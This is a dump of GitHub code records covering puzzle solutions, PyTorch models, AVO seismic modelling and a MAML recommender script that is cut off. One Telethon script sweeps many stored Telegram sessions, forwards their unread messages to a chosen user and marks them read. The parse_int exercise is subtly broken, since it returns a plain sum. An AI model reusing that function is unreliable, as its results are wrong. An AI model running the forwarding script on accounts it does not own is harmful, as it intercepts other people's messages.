Y, S):\n #code here\n # X - pr(String s1), Y - rp(String s2)\n s1=\"pr\"\n s2=\"rp\"\n # decide which has greater cost\n #if X is greater - np - proceed\n if(X st = new Stack<>();\n st=[]\n for i in range(len(S)-1,-1,-1):\n curr=S[i]\n first = s1[0]\n second= s1[1]\n if(len(st)>0 and curr==first and st[-1]==second):\n st.pop()\n ans+=X\n else:\n st.append(curr)\n S=\"\"\n while(len(st)>0):\n S+=st.pop()\n #in rem string check for the other cost Y, if any instances present , remove them now\n for i in range(len(S)-1,-1,-1):\n curr=S[i]\n first = s2[0]\n second= s2[1]\n if(len(st)>0 and curr==first and st[-1]==second):\n st.pop()\n ans+=Y\n else:\n st.append(curr)\n return ans\n\n","repo_name":"ayann01/GFG-POTD","sub_path":"22 March, 2023/String rp or pr.py","file_name":"String rp or pr.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14631478974","text":"# -*- coding: utf-8 -*-\nimport vovp\nimport torch as th\nimport multiprocessing as mp\n\ndef subprocess_client(queue):\n import vovp, logging\n import torch as th\n \n try:\n results = []\n client = vovp.init_client(\"/tmp/dgl_socket\")\n ret_sub = client.get_tensor('asdasd')\n cmp_a = th.tensor([[1, 2, 3], [5, 4, 6]])\n results.append(th.equal(ret_sub, cmp_a))\n queue.put(results)\n except Exception as e:\n logging.info('General exception noted.', exc_info=True)\n queue.put(e)\n\n\ndef test_basic_client():\n client = vovp.init_client(\"/tmp/dgl_socket\")\n a = th.tensor([[1, 2, 3], [5, 4, 6]])\n ret_a = client.put_tensor(\"asdasd\", a)\n ret_b = client.get_tensor('asdasd')\n ctx = mp.get_context('spawn')\n queue = ctx.Queue()\n p = ctx.Process(target=subprocess_client, args=(queue, ))\n p.start()\n p.join()\n ret_list = queue.get()\n for ret in ret_list:\n assert ret\n\nif __name__==\"__main__\":\n test_basic_client()\n","repo_name":"VoVAllen/vovp","sub_path":"tests/test_mp.py","file_name":"test_mp.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12890927862","text":"def solution(command):\n answer = [0]*2 #x,y\n R=0\n L=0 #R,L의 횟수를 체크\n R_L=(R-L)%4\n case=[0,1,2,3]\n \n for i in command:\n if i==\"G\":\n if case[R_L]==0:\n answer[1]+=1\n elif case[R_L]==1:\n answer[0]+=1\n elif case[R_L]==2:\n answer[1]-=1\n else :\n answer[0]-=1\n elif i==\"B\":\n if case[R_L]==0:\n answer[1]-=1\n elif case[R_L]==1:\n answer[0]-=1\n elif case[R_L]==2:\n answer[1]+=1\n else:\n answer[0]+=1\n \n elif i==\"R\":\n R+=1\n else: #i==\"L\"\n L+=1\n R_L=(R-L)%4\n #print(answer,R,L)\n \n \n return answer\nprint(solution(\"GRGLGRG\"))\n\n\n#풀이 길이를 줄인 방식\n\"\"\"def solution(command):\n answer = [0,0]\n dxy=[[0,1],[1,0],[0,-1],[-1,0]]\n d=0\n for i in command:\n if i==\"G\":\n answer[0]=answer[0]+dxy[d][0]\n answer[1]=answer[1]+dxy[d][1]\n elif i==\"B\":\n answer[0]=answer[0]-dxy[d][0]\n answer[1]=answer[1]-dxy[d][1]\n elif i==\"R\":\n d+=1\n d=d%4\n else:\n d-=1\n d=d%4\n \n return answer\"\"\"","repo_name":"Tigerfriend1/Python_algorithm_practice","sub_path":"python/pccp모의고사2_실습용로봇.py","file_name":"pccp모의고사2_실습용로봇.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1117553814","text":"import datetime\nimport logging\nimport os\nimport random\nimport time\nfrom telethon import TelegramClient\nfrom telethon.errors.rpcerrorlist import PhoneNumberOccupiedError, SessionPasswordNeededError, PhoneNumberBannedError\nfrom telethon import functions, types\nfrom telethon.sync import TelegramClient\nfrom telethon import TelegramClient, events, sync\nfrom datetime import datetime, timedelta\n\ndatetime.now()\nOVERALL_COUNTER = 0\nDEAD_SESSIONS = 'lists/dead_sessions.txt'\nADMIN_USER = input(\"write down the username you want to recieve the messages\")\nTARGET_GROUP_LINK_SELECTOR = 0\n\nAPP_ID_CODE = []\nAPP_ID = []\nSESSION_LIST = []\nDATE_LIST = []\n\nlogging.basicConfig(level=logging.DEBUG, format='%(message)s', filename='lists/logs/update_sessions.log')\n\n\ndef file_open(file_name):\n with open(file_name, 'r') as file:\n data = file.read()\n lst_of_data = data.split('\\n')\n for i_data in lst_of_data:\n app_id, app_code = i_data.split(' ')\n APP_ID_CODE.append(app_code)\n APP_ID.append(app_id)\n logging.info(APP_ID)\n logging.info(APP_ID_CODE)\n\n\nfile_open(\"lists/app_id.txt\")\n\nTELEGRAM_SELECTOR = 0\n\nall_sessions = [x for x in os.listdir('.') if 'session' in x]\n\nfor session in all_sessions:\n print(format(OVERALL_COUNTER)+'. '+session)\n OVERALL_COUNTER += 1\n if session in open(DEAD_SESSIONS).read():\n print(\"already found dead\")\n continue\n\n TELEGRAM_SELECTOR = random.randrange(0, len(APP_ID))\n logging.info(datetime.now().time())\n logging.info(session)\n # print(session)\n logging.info(APP_ID[TELEGRAM_SELECTOR])\n client = TelegramClient(session, APP_ID_CODE[TELEGRAM_SELECTOR], APP_ID[TELEGRAM_SELECTOR])\n\n try:\n client.connect()\n # file = open(\"sessions_count/\"+session, \"w\") \n # file.write('1') \n # file.close()\n except Exception as e:\n print(e)\n\n continue\n\n if not client.is_user_authorized():\n print('{} is dead'.format(session))\n # if not client.get_me():\n # f = open(DEAD_SESSIONS, \"a\")\n # f.write(session)\n # f.write('\\n')\n # f.close()\n # print('{} is dead'.format(session))\n # client.disconnect()\n\n # time.sleep(1.1)\n logging.info(datetime.now().time())\n continue\n\n try:\n \n #offset_date = datetime.now() + timedelta(days=-1) # Here, I am adding a negative timedelta\n \tfor dialog in client.get_dialogs(offset_date=datetime.now() + timedelta(days=-1)):\n if dialog.unread_count:\n print(format(dialog.name+', '))\n print(format(dialog.entity.username)+', ')\n print(format(dialog.entity.phone)+', ')\n print(format(dialog.date))\n print(format(dialog.message.message)+', ')\n print('\\n')\n try:\n client.send_message(ADMIN_USER,'שם: '+format(dialog.name)+'\\nיוזר: '+format(dialog.entity.username)+'\\nטלפון: '+format(dialog.entity.phone)+'\\nתאריך/שעה: '+format(dialog.date)+'\\nהודעה: '+format(dialog.message.message))\n client.send_read_acknowledge(dialog.entity.id, dialog.message)\n except Exception as e:\n print(e)\n continue\n except Exception as e:\n print(e)\n continue\n\n time.sleep(0.3)\n client.disconnect()\n","repo_name":"JacobZoarets/tgAdminCode","sub_path":"7.session_replies.py","file_name":"7.session_replies.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25958773015","text":"# -*- coding: utf-8 -*-\r\n# Version:\t\tpython 3.6.5\r\n# Description:\t\r\n# Author:\t\tbqrmtao@qq.com\r\n# date:\t\t\t2019/12/26\r\n\r\nfrom __future__ import absolute_import, print_function\r\n\r\nimport os\r\nimport torch\r\n\r\nfrom tqdm import tqdm\r\n\r\nfrom dataloader import make_data_loader\r\nfrom modeling.backbone import build_backbone\r\nfrom utils.dict_object import DictToObject\r\nfrom utils.evaluator import Evaluator\r\n\r\n\r\nclass FCN(torch.nn.Module):\r\n def __init__(self, layer_config, num_class, is_training):\r\n super(FCN, self).__init__()\r\n\r\n if layer_config in [\"32s\", \"16s\", \"8s\", \"s\"]:\r\n self.layer_config = layer_config\r\n else:\r\n raise ValueError(\"layer_config should be one of [\\\"32s\\\", \\\"16s\\\", \\\"8s\\\", \\\"s\\\"]\")\r\n\r\n self.num_class = num_class\r\n self.is_training = is_training\r\n\r\n kwargs = {\r\n \"num_class\": num_class,\r\n \"with_bn\": False,\r\n \"is_training\": is_training,\r\n \"with_fc\": False,\r\n \"init_weights\": True,\r\n \"verbose\": False,\r\n }\r\n self.vgg_model = build_backbone(\"vgg\", **kwargs)\r\n self._make_transpose_conv()\r\n\r\n def _make_transpose_conv(self):\r\n self.relu = torch.nn.ReLU(inplace=True)\r\n self.deconv_1 = torch.nn.ConvTranspose2d(512, 512, kernel_size=3, stride=2, padding=1, output_padding=1)\r\n self.deconv_2 = torch.nn.ConvTranspose2d(512, 256, kernel_size=3, stride=2, padding=1, output_padding=1)\r\n self.deconv_3 = torch.nn.ConvTranspose2d(256, 128, kernel_size=3, stride=2, padding=1, output_padding=1)\r\n self.deconv_4 = torch.nn.ConvTranspose2d(128, 64, kernel_size=3, stride=2, padding=1, output_padding=1)\r\n self.deconv_5 = torch.nn.ConvTranspose2d(64, 32, kernel_size=3, stride=2, padding=1, output_padding=1)\r\n self.bn_1 = torch.nn.BatchNorm2d(512)\r\n self.bn_2 = torch.nn.BatchNorm2d(256)\r\n self.bn_3 = torch.nn.BatchNorm2d(128)\r\n self.bn_4 = torch.nn.BatchNorm2d(64)\r\n self.bn_5 = torch.nn.BatchNorm2d(32)\r\n self.classifier = torch.nn.Conv2d(32, self.num_class, kernel_size=1)\r\n\r\n def forward(self, x):\r\n output = self.vgg_model(x)\r\n\r\n x5 = output['x5']\r\n score = self.bn_1(self.relu(self.deconv_1(x5)))\r\n\r\n if self.layer_config in [\"16s\", \"8s\", \"s\"]:\r\n score += output['x4']\r\n\r\n score = self.bn_2(self.relu(self.deconv_2(score)))\r\n\r\n if self.layer_config in [\"8s\", \"s\"]:\r\n score += output['x3']\r\n\r\n score = self.bn_3(self.relu(self.deconv_3(score)))\r\n\r\n if \"s\" == self.layer_config:\r\n score += output['x2']\r\n\r\n score = self.bn_4(self.relu(self.deconv_4(score)))\r\n\r\n if \"s\" == self.layer_config:\r\n score += output['x1']\r\n\r\n score = self.bn_5(self.relu(self.deconv_5(score)))\r\n score = self.classifier(score)\r\n\r\n return score\r\n\r\n\r\ndef test(model, criterion, data_loader, evaluator, use_cuda=False):\r\n test_loss = 0\r\n\r\n evaluator.reset()\r\n\r\n model.eval()\r\n\r\n iter_bar = tqdm(data_loader)\r\n for batch_index, batch_sample in enumerate(iter_bar, 1):\r\n sample, target = batch_sample[\"image\"], batch_sample[\"label\"]\r\n\r\n if use_cuda:\r\n sample = sample.cuda()\r\n target = target.cuda()\r\n\r\n output = model(sample)\r\n test_loss += criterion(output, target.long()).data\r\n pred = output.data.max(1)[1] # get the index of the max log-probability\r\n iter_bar.set_description(\"testing loss: %.3f\" % (test_loss / batch_index))\r\n evaluator.add_batch(target.cpu().numpy(), pred.cpu().numpy())\r\n\r\n acc = evaluator.pixel_accuracy()\r\n acc_class = evaluator.pixel_accuracy_class()\r\n miou = evaluator.mean_intersection_over_union()\r\n fwiou = evaluator.frequency_weighted_intersection_over_union()\r\n\r\n print(\"\\tAcc:{},\\n\\tAcc_class:{},\\n\\tmIoU:{},\\n\\tfwIoU: {}\".format(acc, acc_class, miou, fwiou))\r\n\r\n\r\ndef train(model, epoch, criterion, optimizer, data_loader, use_cuda=False):\r\n total_loss = 0\r\n model.train()\r\n\r\n iter_bar = tqdm(data_loader)\r\n for batch_index, batch_sample in enumerate(iter_bar, 1):\r\n sample, target = batch_sample[\"image\"], batch_sample[\"label\"]\r\n\r\n if use_cuda:\r\n sample = sample.cuda()\r\n target = target.cuda()\r\n\r\n output = model(sample)\r\n optimizer.zero_grad()\r\n\r\n loss = criterion(output, target.long())\r\n loss.backward()\r\n\r\n optimizer.step()\r\n\r\n total_loss += loss\r\n iter_bar.set_description(\"training epoch %d loss: %.3f\" % (epoch, total_loss / batch_index))\r\n\r\n\r\ndef main():\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n print(\"using device {}\".format(device))\r\n\r\n args = DictToObject\r\n args.batch_size = 4\r\n args.crop_size = 512\r\n args.dataset = \"pascal\"\r\n args.num_epoch = 300\r\n args.root_dir = \"D:/Projects/DataSets/VOCdevkit/VOC2012\"\r\n args.use_sbd = False\r\n kwargs = {'num_workers': 1, 'pin_memory': True}\r\n train_loader, test_loader, _, num_class = make_data_loader(args, **kwargs)\r\n \r\n evaluator = Evaluator(num_class)\r\n criterion = torch.nn.CrossEntropyLoss(ignore_index=255).to(device)\r\n\r\n check_point_name = \"fcn.t7\"\r\n check_point_path = \"../../checkpoint/\"\r\n full_path = os.path.join(check_point_path, check_point_name)\r\n if os.path.exists(full_path):\r\n print(\"loading model\")\r\n\r\n model = FCN(\"s\", num_class, False).to(device)\r\n model.load_state_dict(torch.load(full_path, map_location=lambda storage, loc: storage))\r\n test(model, criterion, test_loader, evaluator, torch.cuda.is_available())\r\n else:\r\n print(\"training model\")\r\n\r\n if not os.path.exists(os.path.dirname(full_path)):\r\n os.makedirs(os.path.dirname(full_path))\r\n\r\n model = FCN(\"s\", num_class, True).to(device)\r\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-3, betas=(0.9, 0.99))\r\n\r\n for epoch_idx in range(args.num_epoch):\r\n train(model, epoch_idx, criterion, optimizer, train_loader, torch.cuda.is_available())\r\n\r\n if 0 == epoch_idx % 10:\r\n test(model, criterion, test_loader, evaluator, torch.cuda.is_available())\r\n torch.save(model.state_dict(), full_path)\r\n\r\n torch.save(model.state_dict(), full_path)\r\n\r\n\r\nif \"__main__\" == __name__:\r\n main()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"bqrm/deep.learning_pytorch","sub_path":"modeling/segmentation/fcn.py","file_name":"fcn.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10056041773","text":"import torch\n\n\n__all__ = [\n \"AVOLinearModelling\",\n]\n\n\ndef _akirichards(theta, vsvp, n=1):\n theta = torch.deg2rad(theta)\n vsvp = vsvp * torch.ones(n) if not isinstance(vsvp, torch.Tensor) else vsvp\n \n theta = theta[:, None] if vsvp.numel() > 1 else theta\n vsvp = vsvp[:, None].T if vsvp.numel() > 1 else vsvp\n \n c2 = torch.cos(theta) ** 2\n s2 = torch.sin(theta) ** 2\n \n G1 = 1. / (2. * c2) + 0 * vsvp\n G2 = -4. * vsvp ** 2 * s2\n G3 = 0.5 - 2. * vsvp ** 2 * s2\n \n return G1, G2, G3\n\n\ndef _fatti(theta, vsvp, n=1):\n theta = torch.deg2rad(theta)\n vsvp = vsvp * torch.ones(n) if not isinstance(vsvp, torch.Tensor) else vsvp\n \n theta = theta[:, None] if vsvp.numel() > 1 else theta\n vsvp = vsvp[:, None].T if vsvp.numel() > 1 else vsvp\n \n t2 = torch.tan(theta) ** 2\n s2 = torch.sin(theta) ** 2\n \n G1 = 0.5 * (1. + t2) + 0 * vsvp\n G2 = -4. * vsvp ** 2 * s2\n G3 = 0.5 * (4 * vsvp ** 2 * s2 - t2)\n \n return G1, G2, G3\n\n\nclass AVOLinearModelling(torch.nn.Module):\n \n def __init__(self, theta, vsvp=0.5, nt0=1, spatdims=None, linearization='akirich'):\n \n super(AVOLinearModelling, self).__init__()\n \n self.nt0 = nt0 if not isinstance(vsvp, torch.Tensor) else len(vsvp)\n self.ntheta = len(theta)\n \n if spatdims is None:\n self.spatdims = ()\n else:\n self.spatdims = spatdims if isinstance(spatdims, tuple) else (spatdims,)\n \n # Compute AVO coefficients\n if linearization == \"fatti\":\n self.G = torch.stack([gs for gs in _fatti(theta, vsvp, n=self.nt0)], dim=1)\n else:\n self.G = torch.stack([gs for gs in _akirichards(theta, vsvp, n=self.nt0)], dim=1)\n \n # add dimensions to G to account for horizonal axes\n for _ in range(len(self.spatdims)):\n self.G = self.G.unsqueeze(-1)\n \n def forward(self, x):\n \"\"\"\n from model to data\n\n 3 channels -> ntheta channels\n \"\"\"\n if self.G.device != x.device:\n self.G = self.G.to(x.device)\n # G is (ntheta, 3, nt0, spatdims)\n # x is (1, 3, nt0, spatdims)\n # the output has to be (1, ntheta, nt0, spatdims)\n y = torch.sum(self.G * x, dim=1).unsqueeze(0)\n \n return y\n \n def adjoint(self, y):\n \"\"\"\n from data to model\n\n ntheta channels -> 3 channels\n \"\"\"\n if self.G.device != y.device:\n self.G = self.G.to(y.device)\n # G is (ntheta, 3, nt0, spatdims)\n # y is (1, ntheta, nt0, spatdims)\n # the output has to be (1, 3, nt0, spatdims)\n x = torch.sum(self.G * y.transpose(0, 1), dim=0).unsqueeze(0)\n \n return x\n","repo_name":"polimi-ispl/deep_prior_interpolation","sub_path":"operators/avo.py","file_name":"avo.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"72021257129","text":"import sys\nfrom collections import defaultdict\nN = int(sys.stdin.readline())\nrec = defaultdict(int) # 각 방향 몇번 나왔는지\ndir = [] # 방향 순서\nlength = [] # 길이 순서\nn = [] # 직사각형 진짜 길이가 저장된 방향\nindex = [0,0,0,0] # 직사각형 진짜 가로,세로 \n # 잘린 직사각형 가로,세로 인덱스값 저장\n\n# 값 저장\nfor i in range(6):\n a,b = map(int,sys.stdin.readline().split())\n rec[a]+=1\n dir.append(a)\n length.append(b)\n\n# 잘리기 전 직사각형 가로,세로 구하기\nfor i in range(1,5):\n if(rec[i] == 1):\n n.append(i)\n\n# 케이스 4개\nk = n[0]*n[1]\nif(k==3):\n for i in range(6):\n if(dir[i] == 1):\n index[0]=i\n elif(dir[i] == 3):\n index[1]=i\n\nelif(k==4):\n for i in range(6):\n if(dir[i] == 4):\n index[0]=i\n elif(dir[i] == 1):\n index[1]=i\n\nelif(k==6):\n for i in range(6):\n if(dir[i] == 3):\n index[0]=i\n elif(dir[i] == 2):\n index[1]=i\n\nelse:\n for i in range(6):\n if(dir[i] == 2):\n index[0]=i\n elif(dir[i] == 4):\n index[1]=i\n\n# 잘린 직사각형의 인덱스값 찾기\nindex[2] = (index[0]+2)%6\nindex[3] = (index[0]+3)%6\n\n#값 구하기\n\nans = (length[index[0]]*length[index[1]]-length[index[2]]*length[index[3]])*N\nprint(ans)\n","repo_name":"Youngini/baekjoon","sub_path":"baek2477_py.py","file_name":"baek2477_py.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19569302053","text":"number_dict = {\n 'zero': 0,\n 'one': 1,\n 'two': 2,\n 'three': 3,\n 'four': 4,\n 'five': 5,\n 'six': 6,\n 'seven': 7,\n 'eight': 8,\n 'nine': 9,\n 'ten': 10,\n 'eleven': 11,\n 'twelve': 12,\n 'thirteen': 13,\n 'fourteen': 14,\n 'fifteen': 15,\n 'sixteen': 16,\n 'seventeen': 17,\n 'eighteen': 18,\n 'nineteen': 19,\n 'twenty': 20,\n 'thirty': 30,\n 'forty': 40,\n 'fifty': 50,\n 'sixty': 60,\n 'seventy': 70,\n 'eighty': 80,\n 'ninety': 90,\n 'hundred': 100,\n 'thousand': 1000,\n 'million': 1000000\n}\n\n\ndef parse_int(string):\n string = string.replace(' and ', ' ')\n string = string.replace('-', ' ')\n numbers = string.split(' ')\n arr = []\n for item in numbers:\n arr.append(number_dict[item])\n # цикл в котором если элемент a[i - 1] < a[i] то заменяем a[i] на a[i - 1] * a[i], а a[i] удаляем\n i = 0\n total = 0\n temp = 1\n\n while i < len(arr):\n if arr[i] == 100:\n temp *= arr[i]\n elif arr[i] in [1000, 1000000]:\n temp *= arr[i]\n total += temp\n temp = 0\n else:\n temp += arr[i]\n\n i += 1\n\n return sum(arr)\n\n\nprint(parse_int(\"one\")) # 1\nprint(parse_int(\"twenty\")) # 20\nprint(parse_int(\"two hundred forty-six\")) # 246\nprint(parse_int(\"seven hundred eighty-three thousand nine hundred and nineteen\")) # 783919\n","repo_name":"NikGor/CodeWars","sub_path":"parse_int.py","file_name":"parse_int.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13611145771","text":"# You are an owner of a cargo plane with capacity of 500kg. Amazon has asked you\n# to transport as many of the items given in a specific order (their order\n# cannot change) as possible from the US to Europe. They have given you a list\n# of corresponding values which they will pay you for transporting. The total\n# cost of shipping for you is .\n\ncapacity = 500\n\nweights = [94,27,94,50,79,67,43,87,75,84]\nvalues = [200,343,472,141,616,681,932,194,430,482]\n\nshipping_cost = 3500\n\n# Answer the following questions:\n# 1. How many items can you ship to Europe\n# 2. What is their total weight\n# 3. Would you earn any money by acepting Amazon's request?\n\ncurrent_weight = 0\ntotal_value = 0\ni = 0\n\nwhile current_weight < capacity:\n if capacity - current_weight >= weights[i]:\n current_weight += weights[i]\n total_value += values[i]\n i += 1\n else:\n break\n\nprint(\"We can ship\",i,\"items\")\nprint(\"Their total weight is\",current_weight)\n\nif total_value > shipping_cost:\n print(\"We would earn money if we shipped eligible items\")\nelse:\n print(\"Let's refer Amazon to our competitor FedEx\")\n","repo_name":"matthewtaylorsc/pyintro","sub_path":"codelabs/solutions/ex4_amazon_shipping_sol.py","file_name":"ex4_amazon_shipping_sol.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4190467143","text":"import argparse\nimport time\n\nimport torch\n\nimport learn2learn as l2l\nfrom tqdm import tqdm\n\nfrom xmrec.data.data import MAMLTaskGenerator, MetaMarketDataloaders\nfrom xmrec.models.model import NeuMF\nimport pandas as pd\nimport os\nimport json\n\nimport sys\nimport pickle\n\nfrom xmrec.utils.forec_utils import test_model, set_seed, get_model_cid_dir, get_model_config, resume_checkpoint, \\\n save_checkpoint, use_cuda\n\n\ndef create_arg_parser():\n parser = argparse.ArgumentParser('MAML_NeuMF_Engine')\n parser.add_argument(\"--experiment_type\",\n choices=[\"single_model\", \"pair\"],\n help=\"if 'single_model' aug_src_market argument is ignored and all markets are used\",\n default=\"pair\")\n # Path Arguments\n parser.add_argument('--num_epoch', type=int, default=25, help='number of epoches')\n # is kshots here, the default is 20, not 1024\n parser.add_argument('--batch_size', type=int, default=20, help='batch size')\n parser.add_argument('--num_neg', type=int, default=4, help='number of negatives to sample during training')\n parser.add_argument('--cuda', action='store_true', help='use of cuda')\n parser.add_argument('--seed', type=int, default=42, help='manual seed init')\n\n # output arguments\n parser.add_argument('--exp_name', help='name the experiment', type=str, required=True)\n parser.add_argument('--exp_output', help='output results .json file', type=str, required=True)\n\n # data arguments\n parser.add_argument('--data_dir', help='dataset directory', type=str, default='DATA2/proc_data')\n parser.add_argument('--tgt_market', help='specify target market', type=str, required=False,\n default=None) # de_Electronics\n parser.add_argument('--aug_src_market', help='which data to augment with', type=str, default='xx') # us_Electronics\n\n # sampling_method:\n parser.add_argument('--data_sampling_method', help='in augmentation how to sample data for training', type=str,\n default='concat', choices=['concat', 'equal'])\n\n # MAML arguments\n parser.add_argument('--fast_lr', type=float, default=0.1, help='meta-learning rate')\n # cold start setup\n parser.add_argument('--tgt_fraction', type=int, default=1, help='what fraction of data to use on target side')\n parser.add_argument('--src_fraction', type=int, default=1, help='what fraction of data to use from source side')\n\n # during Hyperparam search, we don't need to save the model\n parser.add_argument('--no_save', action=\"store_true\", default=False,\n help=\"disables persisting the final model if set\")\n\n parser.add_argument('--market_aware', action=\"store_true\", default=False,\n help=\"learns market embeddings in addition to user/item embeddings\")\n\n return parser\n\n\ndef fast_adapt(config, batch_adapt, batch_eval, learner, loss, adaptation_steps, mkt_idx):\n adapt_user_ids, adapt_item_ids, adapt_targets, adapt_markets = batch_adapt\n eval_user_ids, eval_item_ids, eval_targets, eval_markets = batch_eval\n\n adapt_markets = torch.LongTensor([mkt_idx[m] for m in adapt_markets])\n eval_markets = torch.LongTensor([mkt_idx[m] for m in eval_markets])\n\n if config['use_cuda'] is True:\n adapt_user_ids, adapt_item_ids, adapt_targets = adapt_user_ids.cuda(), adapt_item_ids.cuda(), adapt_targets.cuda()\n eval_user_ids, eval_item_ids, eval_targets = eval_user_ids.cuda(), eval_item_ids.cuda(), eval_targets.cuda()\n\n adapt_markets = adapt_markets.cuda()\n eval_markets = eval_markets.cuda()\n\n # Adapt the model\n for step in range(adaptation_steps):\n ratings_pred = learner(adapt_user_ids, adapt_item_ids, adapt_markets)\n train_error = loss(ratings_pred.view(-1), adapt_targets)\n learner.adapt(train_error)\n\n # Evaluate the adapted model\n predictions = learner(eval_user_ids, eval_item_ids, eval_markets)\n valid_error = loss(predictions.view(-1), eval_targets)\n return valid_error\n\n\ndef run_batch(iterators, mkt, mkt_idx, maml, config, loss_func, adaptation_steps, train=True, learner=None):\n if learner is None:\n learner = maml.clone()\n adapt_batch = next(iterators[mkt])\n eval_batch = next(iterators[mkt])\n\n evaluation_error = fast_adapt(config,\n adapt_batch,\n eval_batch,\n learner,\n loss_func,\n adaptation_steps,\n mkt_idx)\n if train:\n evaluation_error.backward()\n\n return evaluation_error\n\n\nif __name__ == \"__main__\":\n parser = create_arg_parser()\n args = parser.parse_args()\n set_seed(args)\n\n if args.experiment_type == \"pair\":\n assert args.tgt_market is not None\n assert args.aug_src_market is not None\n markets = [args.tgt_market, args.aug_src_market]\n elif args.experiment_type == \"single_model\":\n args.markets = \"de,jp,in,fr,ca,mx,uk\"\n markets = args.markets.split(\",\")\n else:\n raise ValueError(args.experiment_type)\n\n args.data_augment_method = 'full_aug'\n args.model_selection = 'nmf'\n\n nmf_model_dir, cid_filename = get_model_cid_dir(args, args.model_selection)\n print(nmf_model_dir, cid_filename)\n with open(cid_filename, 'rb') as centralid_file:\n my_id_bank = pickle.load(centralid_file)\n\n ############\n ## All Market data\n ############\n task_gen_all = {}\n market_index = {}\n\n if args.experiment_type == \"single_model\":\n print(\"loading us data\")\n # load the us market data\n us_data_dir = os.path.join(args.data_dir, f'us_10core.txt')\n us_ratings = pd.read_csv(us_data_dir, sep=\" \")\n\n us_task_gen = MAMLTaskGenerator(us_ratings, \"us\", my_id_bank, item_thr=7)\n\n items_allowed = us_task_gen.item_pool_ids\n assert \"us\" not in markets\n task_gen_all[0] = us_task_gen\n market_index[0] = \"us\"\n\n print(f\"data sampling method: {args.data_sampling_method}\")\n for i, market in enumerate(markets, 1):\n print(f\"loading {market}\")\n ratings_path = os.path.join(args.data_dir, f'{market}_5core.txt')\n ratings = pd.read_csv(ratings_path, sep=\" \")\n task_gen_all[i] = MAMLTaskGenerator(ratings, market, my_id_bank, item_thr=7)\n market_index[i] = market\n\n else:\n for mar_index, cur_market in enumerate(markets):\n cur_mkt_data_dir = os.path.join(args.data_dir, f'{cur_market}_5core.txt')\n if cur_market == 'us':\n cur_mkt_data_dir = os.path.join(args.data_dir, f'{cur_market}_10core.txt')\n print(f'loading {cur_mkt_data_dir}')\n cur_mkt_ratings = pd.read_csv(cur_mkt_data_dir, sep=' ')\n\n cur_mkt_fraction = args.src_fraction if mar_index >= 1 else args.tgt_fraction\n\n task_generator = MAMLTaskGenerator(\n ratings=cur_mkt_ratings,\n market=cur_market,\n id_index_bank=my_id_bank,\n item_thr=7,\n sample_df=cur_mkt_fraction)\n\n task_gen_all[mar_index] = task_generator\n market_index[mar_index] = cur_market\n\n print('loaded all data!')\n\n sys.stdout.flush()\n\n ############\n ## Dataset Concatenation\n ############\n sampling_method = args.data_sampling_method # 'concat' 'equal'\n\n dataloaders = MetaMarketDataloaders(tasks=task_gen_all,\n sampling_method=sampling_method,\n num_train_negatives=args.num_neg,\n batch_size=args.batch_size,\n shuffle=True)\n ############\n ## Model Prepare\n ############\n all_model_selection = ['nmf']\n\n results = {}\n\n for cur_model_selection in all_model_selection:\n sys.stdout.flush()\n args.model_selection = cur_model_selection\n config = get_model_config(args.model_selection)\n config['batch_size'] = args.batch_size\n config['optimizer'] = 'adam'\n config['use_cuda'] = args.cuda\n config['device_id'] = 0\n config['save_trained'] = False if args.no_save else True\n config['load_pretrained'] = True\n config['num_users'] = int(my_id_bank.last_user_index + 1)\n config['num_items'] = int(my_id_bank.last_item_index + 1)\n config['num_markets'] = len(markets)\n config['market_aware'] = args.market_aware\n config[\"mkt_idx\"] = {m: i for (i, m) in market_index.items()}\n\n model = NeuMF(config)\n if config['use_cuda'] is True:\n use_cuda(True, config['device_id'])\n model.cuda()\n resume_checkpoint(model, model_dir=nmf_model_dir, device_id=config['device_id'], cuda=config[\"use_cuda\"])\n print(model)\n sys.stdout.flush()\n\n fast_lr = args.fast_lr # =0.5\n # meta_batch_size = train_dataloader.num_tasks # 32\n adaptation_steps = 1\n test_adaptation_steps = 1 # how many times adapt the model for testing time\n\n maml = l2l.algorithms.MAML(model, lr=fast_lr, first_order=False)\n opt = torch.optim.Adam(maml.parameters(), lr=config['adam_lr'], weight_decay=config['l2_regularization'])\n loss_func = torch.nn.BCELoss()\n\n ############\n ## Train\n ############\n\n # do a dummy run to figure out how many batches are there for each\n # market\n samples = {}\n for mkt_idx, mkt in market_index.items():\n samples[mkt_idx] = len(dataloaders.get_split(mkt_idx, \"train\"))\n\n # the original code oversamples the smaller markets\n # but since we want to do epochs based on target markets\n # we will use min instead of max\n n_samples = min(samples.values())\n\n start_time = time.time()\n for epoch in tqdm(range(args.num_epoch), desc=\"Train\"):\n sys.stdout.flush()\n\n # train_dl_dict = {}\n iterators = {}\n valid_iterators = {}\n n_iterations = {}\n for mkt_idx, mkt in market_index.items():\n train_dl = dataloaders.get_single_train_dataloader(mkt_idx,\n n_samples=n_samples,\n shuffle=True)\n iterators[mkt_idx] = iter(train_dl)\n 